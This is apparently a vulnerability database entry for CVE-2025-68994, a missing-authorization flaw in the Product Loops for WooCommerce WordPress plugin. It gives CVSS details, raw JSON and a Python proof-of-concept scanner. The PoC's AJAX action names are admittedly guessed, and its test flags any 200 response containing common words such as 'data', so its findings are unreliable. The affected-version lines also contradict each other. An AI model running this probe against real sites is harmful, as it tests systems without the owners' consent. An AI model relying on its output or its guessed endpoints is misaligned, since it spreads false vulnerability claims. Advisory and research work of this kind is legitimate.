Security Vulnerability Report
中文
CVE-2025-68994 CVSS 5.3 MEDIUM

CVE-2025-68994

Published: 2025-12-30 11:15:58
Last Modified: 2026-04-27 19:16:41

Description

Missing Authorization vulnerability in XforWooCommerce Product Loops for WooCommerce product-loops allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Product Loops for WooCommerce: from n/a through <= 2.1.2.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Product Loops for WooCommerce < 2.1.2
Product Loops for WooCommerce 所有版本至2.1.2版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68994 PoC - Product Loops for WooCommerce Broken Access Control # Affected: Product Loops for WooCommerce <= 2.1.2 # Type: Missing Authorization / Broken Access Control import requests import sys TARGET_URL = "https://example.com" # Replace with target URL def check_vulnerability(): """Check if the target is vulnerable to CVE-2025-68994""" # Try to access admin functions without authentication # Common WordPress AJAX endpoint endpoints = [ f"{TARGET_URL}/wp-admin/admin-ajax.php", f"{TARGET_URL}/wp-json/wp/v2/", ] # Try common plugin actions that should require authentication vulnerable_params = [ {"action": "product_loops_get_data", "post_id": "1"}, {"action": "product_loops_admin", "nonce": ""}, ] print("[*] Testing CVE-2025-68994 - Missing Authorization in Product Loops...") for endpoint in endpoints: for params in vulnerable_params: try: response = requests.get(endpoint, params=params, timeout=10) # Check for successful response with sensitive data if response.status_code == 200: # Check if response contains sensitive information if any(keyword in response.text.lower() for keyword in ['config', 'settings', 'data', 'product']): print(f"[!] VULNERABLE: {endpoint}") print(f"[*] Parameter: {params}") print(f"[*] Response contains potentially sensitive data") return True except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") print("[*] Target may not be vulnerable or is not accessible") return False if __name__ == "__main__": check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68994", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:15:58.173", "lastModified": "2026-04-27T19:16:40.587", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in XforWooCommerce Product Loops for WooCommerce product-loops allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Product Loops for WooCommerce: from n/a through <= 2.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/product-loops/vulnerability/wordpress-product-loops-for-woocommerce-plugin-2-1-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}